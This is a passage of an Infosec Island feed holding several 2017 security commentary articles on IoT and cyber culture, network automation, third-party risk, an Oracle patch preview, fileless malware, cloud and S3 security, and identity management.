Still, having even modest security technology in place can slow the pace of malicious hacking. By making it more time-consuming for someone to hack into a digital device, an attacker is less likely to try. Yet many Internet-enabled consumer devices – elements of the so-called Internet of Things, or IoT, are largely unprotected, exposing them, among other risks, to becoming unwilling robots in a vast network of slave devices engaged in denial of service attacks.

That’s not inevitable; it’s a manufacturer’s choice, driven by economics. The fact is that security can be expensive, and these devices were never designed with security in mind. They were created from the outset to provide and process information at the lowest possible cost. But by maintaining an open connection to the individual’s home computer – a device which may, in turn, be connected to an employer’s network – it offers intruders a portal to inflicting damage that goes well beyond the owner’s home thermostat or voice-driven speaker device. Securing them may become an appropriate topic for government regulation.

Cyber Culture

Although no one is feeling nostalgic about it, there was a time, not terribly long ago, when conducting cyber mischief was a personal enterprise, often a lonely teen operating out of their home basement or bedroom. But today, in the eyes of institutions eager to secure sensitive digital files, the solitary teenage hacker is less a problem than a nuisance. 

What has largely taken his place – and the overwhelming majority of hackers are male – are well organized, highly resourced criminal enterprises, many of which are based overseas, with the ability to monetize stolen data on a scale rarely if ever achieved by the bedroom-based hacker. The most persistent of them – and the hardest to defend against – are state-sponsored. But it is among young people that cyber-culture, including its more malevolent forms, is spread and nourished. And they don’t need to be thugs to participate.

Last year alone, the value of cyber theft was estimated to have reached into the hundreds of billions of dollars, and it’s growing. But unlike bank robberies of years past, cyber-theft bypasses the need to confront victims with threats of harm to coerce them to hand over money. In fact, at the end of 2013, the British Bankers Association reported that “traditional” strong-arm bank robberies had dropped by 90 percent since 2003.  

Instead, with just a few keystrokes – often entered from thousands of miles away – the larcenous acts themselves, which produce neither injury nor fear, seem almost harmless. And, at least in the eyes of adolescent perpetrators – eyes which are frequently hidden behind a mantle of anonymity and under the influence of lawless virtual worlds that populate immersive online games – the slope leading from cyber mischief into cyber crime is very gradual and hard to discern. 

Other hackers have different motives – some feel challenged to probe and test the security of an institution’s firewalls; others to shame, expose, or seek revenge on an acquaintance, and a few posturing as highly principled whistleblowers unmasking an organization’s most sensitive secrets. But even the most traditional notions of privacy and secrecy have themselves undergone something of a metamorphosis lately. 

Examples are legion:

  • Earlier this year, as I was flying from Chicago to New York, I couldn’t help but overhear the gentleman on the opposite side of the aisle telling his seatmate – a complete stranger – all about his recent prostate surgery. 
  • Attractive and aspiring celebrities regularly leak – actually, a better term for it might be that they release – videos of the most intimate moments they’ve had with recent lovers.
  • Daytime TV are shows in which a host gleefully exploits the private family dysfunctions of his guests have become a programming staple.
  • People working for extremely sensitive government organizations self-righteously hand over the nation’s most confidential data files to be posted online, purportedly to serve the public interest.

A Seismic Shift

There’s a common thread running through each of these examples.  It’s that conventional notions of privacy and appropriate information sharing have changed dramatically. It is a shift which is particularly apparent in the way younger people use the Internet in their private lives, which frequently includes the exchange of highly personal information and images. 

However, for their employers, whose electronic files typically contain sensitive personnel, financial and trade information, that behavior is not only a security concern, it is a journey into treacherous legal territory. And it is a journey which knows no jurisdictional lines. Different national cultures exert a powerful influence on their citizens’ online behavior. What are considered harmless pranks and cyber horseplay and among young people in Iraq would be seen as hostile cyber attacks in the U.S.

What we find perplexing is not so much a rapid advance in technology as a profound cultural shift – a sea change that needs to be recognized, shaped and ultimately accommodated to support appropriate and lawful use of these powerful cyber tools. That shift has a direct impact on the workplace. While an employee’s online behavior can certainly damage the organization, those acts are rarely deliberate. In fact, the greater risk comes with behaving too trustfully – opening suspicious emails, clicking on links and uploading files which inadvertently create access to the organization’s network. From there, a malicious attack can move in any direction, creating massive damage.

A New Sheriff?

The heady combination of cyber whiz kids, seismic cultural change, anomic virtual realities, sophisticated criminal gangs, state-sponsored attacks and a vigorous, web-enabled marketplace for all sorts of contraband has produced a kind of Wild West on steroids – something like the early days of automobiles, only this time on a global scale with major incidents reported almost daily. 

At the same time, however, even the Wild West brought on by the motor car was eventually tamed, or at least absorbed into the mainstream of commerce and culture. That transformation was achieved through a trifecta of improved technology for both vehicles and infrastructure, more comprehensive laws coupled with better law enforcement, and a gradual shift in driving culture affecting the perceptions and behavior of motorists. 

In the cyber world, much the same dynamic applies. Improvements in technology will continue making private data more secure. A more encompassing regimen of laws and treaties affecting users and suppliers of equipment as well as service providers will help codify the public’s requirements for security. The European Union’s recently adopted General Data Protection Regulation (GDPR), which gives back control of citizens’ personal data while unifying regulation within the EU, is an encouraging example. And more imaginative forms of cyber education to strengthen the culture by supporting appropriate uses of the technology – some of which are already underway in elementary and high school classrooms – will help to crystalize public expectations and inform behavior for the next generation of cyber citizens.

About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.

Copyright 2010 Respective Author at Infosec Island]]>
Calming the Complexity: Bringing Order to Your Network Fri, 20 Oct 2017 13:34:05 -0500 In thinking about today’s network environments – with multiple vendors and platforms in play, a growing number of devices connecting to the network and the need to manage it all – it’s easy to see why organizations can feel overwhelmed, unsure of the first step to take towards network management and security. But what if there was a way to distill that network complexity into an easily-managed, secure, and continuously compliant environment?

Exponential Growth

Enterprise networks are constantly growing. Between physical networks, cloud networks, the hybrid network, and the fluctuations that mobile devices introduce to the network, the number of connection points to a network that need to be recognized and protected is daunting. Not to mention that in order to keep your organization running at optimal efficiency – and to keep it secure from potential intrusions – you must operate at the pace that the business dictates. New applications need to be deployed and ensuring connectivity is an absolute requisite, but the old now overly permissive rules need to be removed, and servers decommissioned – it’s a lot, but teams can trudge through it.

But getting through it isn’t all that you have to worry about – the potential for human error on a simple network misconfiguration needs to be factored in as well. As any IT manager knows, even slight changes to the network environment – intended or not – can have a knock-on effect across the entire network.  

What’s in Your Network?

Adding up all the moving parts that make up the network, the likely risk of introducing error through manual processes and the resulting consequences of such errors puts your network in a persistent state of jeopardy. This can take the form of lack of visibility, increased time for network changes, disrupted business continuity, or an increased attack surface that cybercriminals could find and exploit.

Considering how large enterprise networks are and the number of changes required to keep the business growing, – an organization’s security team can face hundreds of change requests each and every week. These changes are too numerous, redundant, and difficult to manage manually; in fact, one manual rule change error could inadvertently introduce new access points to your network zones that may be exposed to nefarious individuals. In a large organization, small problems can quickly escalate.

The network has also fundamentally changed. Long gone are the days of sole reliance on the physical data center as organizations incorporate the public cloud and hybrid networks into their IT infrastructure. Understanding your network topology is substantially more difficult when it’s no longer on premise. Hybrid networks are not always visible to the IT and security teams, and thus complicates the ability to maintain application connectivity and ensure security.

Network Segmentation & Complexity: A Balancing Act

Network segmentation limits the exposure that an attacker would have in the event that the network is breached. By segmenting the network into zones, any attacker that enters a specific zone would be able to access only that zone – nothing else. By dividing their enterprise networks into different zones, IT managers minimize access privileges, ensuring that only those who are permitted have access to the data, information, and applications they need.

However, by segmenting the network you’re inherently adding more complexity to be managed. The more segments you have, the more opportunity there is for changes to be made in the rules that govern access among these zones.

How can an IT manager turn an intricate, hybrid network into something manageable, secure, and compliant?

The Answer: Automation and Orchestration

As we have seen, the enterprise network changes all the time – so it’s imperative to ensure that you’re making the correct decisions so that changes do not put the company at risk. The easiest way to do this is to set a network security policy, and use that policy as the guide for all changes that are made in the network. Using a policy-based approach, any change within the network infrastructure is confirmed to be secure and compliant. With a centralized policy in place, now you have control.

The next step to managing complexity is removing the risks of manual errors. This is where automation and orchestration built on a policy-based approach is required.

Now you’re able to analyze the network, design network security rules, and develop and automate the rule approval process. This approach streamlines the change process and eradicates unintended errors.

Using the right automation and orchestration tools can add order and visibility to the network, manage policy violations and exceptions, and streamline operations with continuous compliance and risk management.

Together, automation and orchestration of network security policies ensures that you have a process in place that will enable you to make secure, compliant changes across the entire network – without compromising agility, risking network downtime, or investing valuable time on tedious, manual tasks.

Complexity is the reality of today’s enterprise networks. Rather than risk letting one small event cause a big ripple across your entire organization, with an automated and orchestrated approach to network security management, your network can become better-controlled – helping you improve visibility, compliance, and security.

About the author: Reuven Harrison is CTO and Co-Founder of Tufin. He led all development efforts during the company’s initial fast-paced growth period, and is focused on Tufin’s product leadership. Reuven is responsible for the company’s future vision, product innovation and market strategy. Under Reuven’s leadership, Tufin’s products have received numerous technology awards and wide industry recognition.

Copyright 2010 Respective Author at Infosec Island]]>
#NCSAM: Third-Party Risk Management is Everyone’s Business Tue, 17 Oct 2017 07:20:00 -0500 One of the weekly themes for National Cyber Security Awareness Month is “Cybersecurity in the Workplace is Everyone’s Business.”

And we couldn’t agree more. Cybersecurity is a shared responsibility that extends not just to a company’s employees, but even to the vendors, partners and suppliers that make up a company’s ecosystem. The average Fortune 500 company works with as many as 20,000 different vendors, most of whom have access to critical data and systems. As these digital ecosystems become larger and increasingly interdependent, the exposure to third-party cyber risk has emerged as one of the biggest threats resulting from these close relationships.

Third-party risk is only going to get more difficult, but collaboration – the pooling of information, resources and knowledge – represents the industry’s best chance to effectively mitigate this growing threat. The PwC Global State of Information Security Survey 2016 found that 65 percent of organizations are formally collaborating with partners to improve security and reduce risks.

Overall, organizations need to put more emphasis on understanding the cyber risks their third parties pose. What risks does each third party bring to your company? Do they have access to your network? What would the impact be if they were to be breached? One of the key ways to do this is by engaging with your third parties, and assessing them based of the appropriate level of risk they pose and collaborating with them on a prioritized mitigation strategy.

It’s unlikely that the pressure facing businesses to become more efficient will lessen, which means larger digital ecosystems and more cyber risks to businesses. The only way to protect your organization from suffering a data breach as a result of a third party is to put more emphasis on understanding the cyber risks your third parties pose and working together to mitigate them.

Learn more about NCSAM at:

Help spread the word by joining in the online conversation using the #NCSAM hashtag!

About the author: As Head of Business Development, Scott is responsible for implementing CyberGRX’s go-to-market and growth strategy. Previous to CyberGRX, he led sales & marketing at SecurityScorecard, Lookingglass, iSIGHT Partners and iDefense, now a unit of VeriSign.

Copyright 2010 Respective Author at Infosec Island]]>
Oracle CPU Preview: What to Expect in the October 2017 Critical Patch Update Tue, 17 Oct 2017 05:12:00 -0500 The recent media attention focused on patching software could get a shot of rocket fuel on Tuesday with the release of the next Oracle Critical Patch Update (CPU). In a pre-release statement, Oracle has revealed that the October CPU is likely to see nearly two dozen fixes to Java SE, the most common language used for web applications. New security fixes for the widely used Oracle Database Server are also expected along with patches related to hundreds of other Oracle products.

Most of the Java related flaws can be exploited without needing user credentials, with the highest vulnerability score expected to be 9.6 on a 10.0 scale. The CPU could also include the first patches related to the latest version of Java - Java 9 - which was released in September.

Oracle is also expected to include advanced encryption capabilities included in Java 9 (JCE Unlimited Strength Policy Files) for previous Java versions 8 – 6.

The October CPU comes on the heels of a September out-of-cycle Security Alert from Oracle addressing flaws exploited in the Equifax attack. The Alert followed the announcement of vulnerabilities in the Struts 2 framework by Apache that were deemed too critical to wait for distribution in the quarterly patch update.

IBM also issued an out-of-cycle patch to address flaws in IBM’s Java related products in the wake of the Equifax breach.

The Equifax attack has put a spotlight on the vital importance of rapidly applying security patches as well as the continuing struggle of security teams to keep pace with the increasing pace and size of patches. So far in 2017, NIST’s National Vulnerability Database has catalogued 11,525 new software flaws and has tracked more than 95,000 known vulnerabilities.

Oracle will release the final version of the CPU mid-afternoon Pacific Daylight Time on Tuesday, 17 October.   

About the author: James E. Lee is the Executive Vice President and Chief Marketing Officer at Waratek Inc., a pioneer in the next generation of application security solutions.

Copyright 2010 Respective Author at Infosec Island]]>
Surviving Fileless Malware: What You Need to Know about Understanding Threat Diversification Fri, 13 Oct 2017 11:50:00 -0500 Businesses and organizations that have adopted digitalization have not only become more agile, but they’ve also significantly optimized budgets while boosting competitiveness. Despite these advances in performance, the adoption of these new technologies has also increased the attack surface that cybercriminals can leverage to deploy threats and compromise the overall security posture of organizations.

The traditional threat landscape used to involve threats designed to either covertly run as independent applications on the victim’s machine, or compromise the integrity of existing applications and alter their behavior. Commonly referred to as file-based malware, traditional endpoint protection solutions have incorporated technologies designed to scan files written to disk before execution.

File-based vs. Fileless

Some of the most common attack techniques involve victims either downloading a malicious application whose purpose is to silently run in the background and track the user’s behavior or to exploit a vulnerability in a commonly installed piece of software so that it can covertly download additional components and execute them without the victim’s knowledge.

Traditional threats must make it onto the victim’s disk before executing the malicious code. Signature-based detection exists specifically for this reason, as it can uniquely identify a file that’s known to be malicious and prevent it from being written or executed on the machine. However, new mechanisms such as encryption, obfuscation, and polymorphism have rendered traditional detection technologies obsolete, as cybercriminals cannot only manipulate the way the file looks for each individual victim, but also make it difficult for security scanning engines to analyze the code within them.

Traditional file-based malware is usually designed to gain unauthorized access to the operating system and its binaries, normally creating or unpacking additional files and dependencies, such as .dll, .sys or .exe files, that have different functions. They could also install themselves as drivers or rootkits to take full control of the operating system if they could obtain the use of a valid digital certificate to avoid triggering any traditional file-based endpoint security technologies. One such piece of file-based malware was the highly advanced Stuxnet, designed to infiltrate a specific target while remaining persistent. It was digitally signed and had various modules that enabled it to covertly spread from one victim to another until it reached its intended target.

Fileless malware is completely different than file-based malware in terms of how the malicious code is executed and how it dodges traditional file-scanning technologies. As the term implies, fileless malware does not involve any file written on-disk for it to be executed. The malicious code may be executed directly within the memory of the victim’s computer, meaning that it will not be persistent after a system reboot. However, various techniques have been adopted by cybercriminals that combine fileless abilities with persistence. For example, malicious code placed within registry entries and executed each time Windows reboots, allows for both stealth and persistency.

The use of scripts, shellcode and even encoded binaries is not uncommon for fileless malware leveraging registry entries, as traditional endpoint security mechanisms usually lack the ability to scrutinize scripts. Because traditional endpoint security scanning tools and technologies mostly focus on static file analysis between known and unknown malware samples, fileless attacks can go unnoticed for a very long time.

The main difference between file-based and fileless malware is where and how its components are stored and executed. The latter is becoming increasingly popular as cybercriminals have managed to dodge file scanning technologies while maintaining persistency and stealth.

Delivery mechanisms

While both types of attacks rely on the same delivery mechanisms, such as infected email attachments or drive-by downloads exploiting vulnerabilities in browsers or commonly used software, fileless malware is usually script-based and can leverage existing legitimate applications to execute commands. For example, PowerShell scripts that are attached to booby-trapped Word documents can automatically be executed by PowerShell – a native Windows tool. The resulting commands could either send detailed information about the victim’s system to the attacker or download an obfuscated payload that the local traditional security solution can’t detect.

Other possible examples involve a malicious URL that, once clicked, redirects the user to websites that exploit a Java vulnerability to execute a PowerShell Script. Because the script itself is just a series of legitimate commands that may download and run a binary directly within memory, traditional file-scanning endpoint security mechanisms will not detect the threat.

These elusive threats are usually targeted at specific organizations and companies with the purpose of covert infiltration and data exfiltration.

Next-gen endpoint protection platforms

These next-gen endpoint protection platforms are usually the type of security solutions that combine layered security – which is to say file-based scanning and behavior monitoring – with machine learning technologies and threat detection sandboxing. Some technologies rely on machine learning algorithms alone as a single layer of defense. Whereas, other endpoint protection platforms use detection technologies that involve several security layers augmented by machine learning. In these cases, the algorithms are focused on detecting advanced and sophisticated threats at pre-execution, during execution, and post-execution.

A common mistake today is to treat machine learning as a standalone security layer capable of detecting any type of threat. Relying on an endpoint protection platform that uses only machine learning will not harden the overall security posture of an organization.

Machine learning algorithms are designed to augment security layers, not replace them. For example, spam filtering can be augmented through the use machine learning models, and detection of file-based malware can also use machine learning to assess whether unknown files could be malicious.

Signature-less security layers are designed to offer protection, visibility, and control when it comes to preventing, detecting, and blocking any type of threat. Considering these new attack methods, it’s highly recommended that next-gen endpoint security platforms protect against attack tools and techniques that exploit unpatched known vulnerabilities – and of course, unknown vulnerabilities – in applications. 

It’s important to note, traditional signature-based technologies are not dead and should not be discarded. They’re an important security layer, as they’re accurate and quick to validate whether a file is known to be malicious or not. The merging of signatures, behavioral-based, and machine learning security layers create a security solution that’s not only able to deal with known malware, but also tackle unknown threats, which boosts the overall security posture of an organization. This comprehensive mix of security technologies is designed to not only increase the overall cost of attack for cybercriminals, but also offer security teams deep insight into what types of threats are usually targeting their organization and how to accurately mitigate them.

About the author: Bogdan Botezatu is living his second childhood at Bitdefender as senior e-threat analyst. When he is not documenting sophisticated strains of malware or writing removal tools, he teaches extreme sports such as surfing the Web without protection or how to rodeo with wild Trojan horses.

Copyright 2010 Respective Author at Infosec Island]]>
Why Cloud Security Is a Shared Responsibility Fri, 13 Oct 2017 10:57:53 -0500 Security professionals protect on-premises data centers with wisdom gained through years of hard-fought experience. They deploy firewalls, configure networks and enlist infrastructure solutions to protect racks of physical servers and disks.

With all this knowledge, transitioning to the cloud should be easy. Right?

Wrong. Two common misconceptions will derail your move to the cloud

  1. The cloud provider will take care of security
  2. On-premises security tools work just fine in the cloud

So, if you’re about to join the cloud revolution, start by answering these questions: how are security responsibilities shared between clients and cloud vendors? And why do on-premises security solutions fail in the cloud?

Cloud Models and Shared Security

A cloud model defines the services provided by the provider. It also defines how the provider splits security responsibilities with customers. Sometimes the split is obvious: cloud providers are, of course, tasked with physical security for their facilities. Cloud customers, obviously, control which users can access their apps and services. After that the picture can get a little murky.

The following three cloud models don’t comprehensively account for every cloud variation, but they help clarify who is responsible for what:

Software-as-a-Service (SaaS): SaaS providers are responsible for the hardware, servers, databases, data, and the application itself. Customers subscribe to the service and end users interact directly with the application(s) provided by the SaaS vendor. Salesforce and Office365 are two well-known SaaS offerings.

Platform as a Service (PaaS): PaaS vendors offer a turnkey environment for higher-level programming. The vendor manages the hardware, servers, and databases while the PaaS customer writes the code needed to deliver custom applications. Engine Yard and Google App Engine are examples of PaaS solutions.

Infrastructure as a Service (IaaS): An IaaS environment lets customers create and operate an end-to-end virtualized infrastructure. The IaaS vendor manages all physical aspects of the service as well as the virtualization services needed to build solutions. Customers are responsible for everything else - the applications, workloads, or containers deployed in the cloud. Amazon Web Services (AWS) and Microsoft Azure are popular IaaS solutions.

The key to understanding shared security lies in understanding who makes the decisions about a specific aspect of the cloud solution. For example, Microsoft calls the shots on Excel development for their Office 365 SaaS solution. Vulnerabilities in Excel are, therefore, Microsoft’s responsibility. In the same spirit, security vulnerabilities in an app you create on a PaaS service are your responsibility - but operating system vulnerabilities are not.

This all seems like common sense - but it means you’ll need to understand your cloud model to understand your security responsibilities. If you’re securing an IaaS solution you’ll need to take a broad perspective. Everything from server configurations to container provenance can impact your security posture - and they are your responsibility.

Security “Lift and Shift”

An IaaS solution can virtually replicate on-premises infrastructure in the cloud. So lifting and shifting your on-premises security to the cloud may seem like the best way to get up and running. But that approach has led many cloud transitions to ruin. Why? The cloud needs different security approaches for three important reasons:

Change Velocity

Hardware limits how fast a traditional data center can change. The cloud eliminates physical constraints and changes how we think about servers and storage. Cloud solutions, for example, scale by instantly and automatically bringing new servers online. But for traditional security tools, this cloud velocity is chaos. Metered usage costs rapidly spin out of control. Configuration and policy management becomes an overwhelming task. Interdependent security processes become brittle and unreliable.

Network Limitations

On-premises data centers take advantage of stable networks to establish boundaries. In the cloud, networks are temporary resources. Virtual entities join and leave instantaneously and across geographical boundaries. Network identifiers (like IP addresses) no longer provide the same stable control points as they once did and encryption makes it harder to observe application behavior from the network. Network-centric security tools leave cloud solutions vulnerable to lateral movement by attackers.

Cloud Complexity

When the cloud removes barriers to velocity, the number of machines, servers, containers, and networks explodes. As complex as on-premises data centers can be, cloud solutions are far worse: the number of cloud entities, configuration files, event logs, locations, networks, and connections are too much for even expert human analysis. Analyzing security incidents, assessing the impact of a breach, or even simply tracing an administrator’s activities isn’t possible with traditional data center security tools.

Cloud Security Needs New Solutions

Moving to the cloud is more than a simple lift-and-shift of existing servers and apps to a different set of servers. Granted, offloading infrastructure responsibilities to your provider is a huge win. Without capital expenses and the inertia of hardware, IT organizations do more with less, faster.

Fortunately, new cloud-centric security solutions make your move to the cloud easier. Three key capabilities can keep you out of trouble as you transition: automation, an expanded focus on apps and operations (in addition to networks), and behavioral baselining.

Automation makes it possible to keep up with cloud changes (and DevOps teams) during deployment, operations, and incident investigations. Moving the security focus up the stack reduces the impact of network impermanence in the cloud and delivers better visibility into high-level application and service operations. And behavioral baselining makes short work of otherwise tedious rule and policy development.

With the right technologies, and an understanding of differences, security pros can easily make the move to the cloud.

About the author: Sanjay Kalra is co-founder and CPO at Lacework, leading the company’s product strategy, drawing on more than 20 years of success and innovation in the cloud, networking, analytics, and security industries.

Copyright 2010 Respective Author at Infosec Island]]>
Put Your S3 Buckets to the Test to Ensure Cloud Fitness Fri, 13 Oct 2017 09:33:00 -0500 A poignant aspect of many of the headline-grabbing data breaches is the relative ease with which hackers were able to get to sensitive data. We think of hackers running wildly complex algorithms and plotting with sophisticated schemes, but when you encounter a data repository named "Access Keys", and it doesn't require a password, it turns out your job is pretty easy.

AWS S3 buckets are getting the lion's share of the blame for many of these breaches. But like any asset, S3 buckets simply operate according to how they're configured and managed. And therein is a problem that's representative of so much of the vulnerabilities faced by cloud users. Misconfigurations, poorly constructed access policies, lack of controls; these are just some of the issues that can open a cloud environment to bad actors, and all of this work is directed by humans, with the S3 buckets just doing what they're told. In an environment that's as dynamic as a typical enterprise cloud, humans aren't necessarily going to be able to keep track of every aspect of every asset. For these assets to function optimally and securely, organizations have to apply active management along with continuous scrutiny to ensure they operate optimally and with effective security controls.

Within a cloud environment, there are so many factors all repeatedly and simultaneously occurring. IT teams have to think both about being active and reactive in order to effectively deal with vulnerabilities and attacks. To support those efforts, they have processes and tools that prevent, monitor, and remediate, all in an effort to constantly thwart risk. While the potential for incoming issues is massive, the work required to mitigate that risk can be fairly simple, but like exercise and regular check-ups, they have to be done regularly and with purpose.

We know that default settings from AWS tend to be fairly permissive; some of the problem in so many breaches relates to this permissive nature. But no customer should operate something so important to their environment without customizing it to their own needs. And no matter what their infrastructure needs are, the privacy of their data and that of their customers requires that they put their S3 buckets through fitness tests to ensure they are aware and in control of how those buckets are functioning. Enterprises that want to effectively secure S3 buckets must recognize the liability involved if these get breached. There are some key aspects to how S3 objects and buckets operate, and security teams should be familiar with AWS settings and functionality before they move forward with implementing a security plan. These include access to buckets, user rights within buckets, and versioning and logging capabilities.

Access to your stored data is the logical initial place to start. There are settings in AWS that allow you to determine who can view lists of your S3 buckets, and who can see and edit your Access Control Lists (ACLs). If your buckets have those settings set to give “All AWS Users” access, you are setting yourself up to be compromised. With global ACL permissions on, you allow anyone to grant wide permissions to your content, at best, you give them a detailed treasure map of which buckets may contain interesting data.

At the same time, while the breaches that make the news are all about hackers getting access to remove data, hackers putting data into your S3 buckets can be equally dangerous to your organization. If the Global PUT permission is enabled on any of your S3 buckets it means that anyone can place information into your S3 buckets. This may seem harmless, but someone with malicious intent could place content that would be harmful or embarrassing to your business into your buckets. It is best to only allow authorized users and systems to PUT to your S3 buckets. With the right permissions, a bad actor can also apply "global delete" to your repository which would wipe all the data contained therein. Requiring multi-factor authentication (MFA) in order to use that capability can ensure that CloudTrail logs and other sensitive data cannot be removed by an unauthorized user.

AWS customers should also be aware that the default settings do not enable versioning of S3 objects by default. Versioning is incredibly important; in the event of an object being overwritten or deleted, versioning keeps an instance of the object available to “roll back” to as a method of recovery. Additionally, with audit logging of your S3 buckets enabled, you will be able to get the details of all bucket activity. The logs are an important tool when troubleshooting issues, or investigating an incident. Logging cannot be enabled retroactively, so it is important to collect your audit logs as you set up your S3 buckets if you wish to keep tabs on bucket/object activity.

Advice must be followed by action in order to become, and remain, fit in the cloud. While these measures are critical to attain the basic level of security for your S3 buckets, they are always going to be a target because they store sensitive data. So, continuous awareness through automated monitoring will provide the necessary control needed to identify and fix vulnerabilities, and provide the right layer of control to maintain safe and effective business operations.

Copyright 2010 Respective Author at Infosec Island]]>
Is Your “Father’s IAM” Putting You at Risk? Fri, 13 Oct 2017 07:29:00 -0500 Identity and access management (IAM) is all about ensuring that the right people, have the right access, to the right resources and that you can prove that all the access is right. But as any of us that are heavily involved in IAM know, that is much easier said than done. There’s a lot that goes into getting all those things “right.”

First you must set up the accounts that enable a user to get to the right stuff – that is often called provisioning (and its dangerous sister, de-provisioning). Second, in order for that account to grant the appropriate access, there has to be a concept of authorization which provides a definition for what is allowed and not allowed with that access. And third, there should be some way to make sure that provisioning and de-provisioning are done securely (and ideally efficiently), and that the associated authorization is accurate – i.e. everyone has exactly the access they need, nothing more and nothing less.

Everyone has been provisioning and de-provisioning since we first started networking PCs. And as soon as larger numbers of users began using those computers, this has forced the need to implement some concept of authorization. The problem is that the practices that worked so well in these relatively closed networks with relatively few users simply don’t cut it in today’s open (close to boundary-less), fluid, and modern networks. The result is loads of inefficiency, elevated risk, and the potential for catastrophic breaches.

In recent research sponsored by One Identity, the dangers of old-fashioned practices for provisioning and de-provisioning and authorization were stripped bare before the world. Stated plainly, the practices and technologies that served you so well in the past, simply are inadequate in today’s digitally transformed world.

Here’s some of the key findings gleaned from responses from more than 900 IT-security professionals worldwide, with a little exposition on each:

  • 87% reported that they have dormant accounts and 71% were concerned about them – that means that more than three-quarters of those interviewed have not de-provisioned accounts that are no longer needed, either because the user is no longer with the organization or has switched roles and most of those are worried about it.
  • Only 1/3 expressed that they were “very confident” that they even knew which dormant user accounts exist. So not only do they have dangerous entry points into their networks, most people couldn’t even tell you what accounts they were.
  • 97% have a process for identifying dormant accounts but only 19% have tools to help find them. In addition 92% report that they regularly check for dormant accounts. This is where there is a disconnect. If the majority have dormant accounts and most have a process to find them, obviously the process is not working. In spite of best efforts (or as I would say old-fashioned de-provisioning practices) the risk is still there.

The risk is not in the fact that there are dormant accounts, the risk is what can be done with those hidden doors into your systems and data. Most high-profile breaches are the result of a bad actor compromising a legitimate user account. That could be gaining access through phishing or social engineering or hunting for and finding a dormant account that the organization doesn’t even know exists. Once in, a series of lateral moves and rights escalation activities can result in access to those systems and that data that you are trying to protect.

So here’s where the second set of data becomes remarkably intriguing. We asked the same 900+ IT security professionals a series of questions about the rights and permissions that their users possess, and here were the big reveals:

  • Only one in four expressed that they were “very confident” that user rights and permissions are correct. That means that ¾ of our respondents were unsure of the fundamental aspect of access control – authorization. Any user with excessive rights (rights that are more than necessary to do the job) is an easy path for bad actors to execute those lateral moves they are so good at.
  • Less than 1/3 are “very confident” that users are de-provisioned properly. By properly we mean fully and immediately (only 14% of respondents reported that users were de-provisioned immediately upon a change in status). De-provisioning is the process of turning off accounts and revoking rights when they are no longer needed. Poor de-provisioning, either through outdated and cumbersome manual processes or limited tools, is the primary cause of dormant accounts.
  • In fact, 95% reported that while they have a process for de-provisioning, it requires IT intervention. In other words, someone has to put hands on a keyboard to make it happen. Any amount of time that an unneeded account remains “open” is an invitation for disaster as evidenced by so many of the high-visibility breaches over the past several years.

So what can be done? There are many ways to modernize these processes and get IAM right. Here’s a few suggestions:

  1. Determine a single source of the truth for authorization. Define business roles once and use them everywhere. And most importantly, let the line-of-business be the decision makers here. Many instances of inappropriate rights are simply the byproduct of IT doing the best they can with the knowledge they’ve been given. It’s all too common for the line-of-business to ask IT to “give Joe the same rights as Bill” when there was no oversight into what rights Bill has, how he got them, and whether they are still appropriate for the job he does.
  2. De-provision immediately and completely. Tools exist that can update permissions at the instance status changes in an authoritative data source. For example, as soon as an employee’s status in the HR system switches from active to inactive, that user’s access rights across every system in the enterprise (including cloud-based services) can also be immediately terminated as well – effectively closing all those doors and eliminating dormant accounts.
  3. Implement identity analytics. A new class of IAM solution called identity analytics will proactively and constantly evaluate your systems to find instances where user rights are out of alignment with what is “right.” These technologies quickly find dormant accounts, mis-provisioned accounts, and instances of rights elevation that are often the smoking gun in breach detection and prevention.

Just like the technology we rely on every day is evolving and the boundaries expanding, the identity and access management practices we use to secure access to those systems must evolve as well. As our survey reaffirmed, what worked well a few years ago is almost certainly inadequate given today’s realities. But there is hope, with simple shifts in responsibility, IAM practices, and IAM technologies you can significantly reduce risk, modernize your business, and sleep better at night.

About the author: Jackson Shaw is senior director of product management at One Identity, an identity and access management company formerly under Dell. Jackson has been leading security, directory and identity initiatives for 25 years.

Copyright 2010 Respective Author at Infosec Island]]>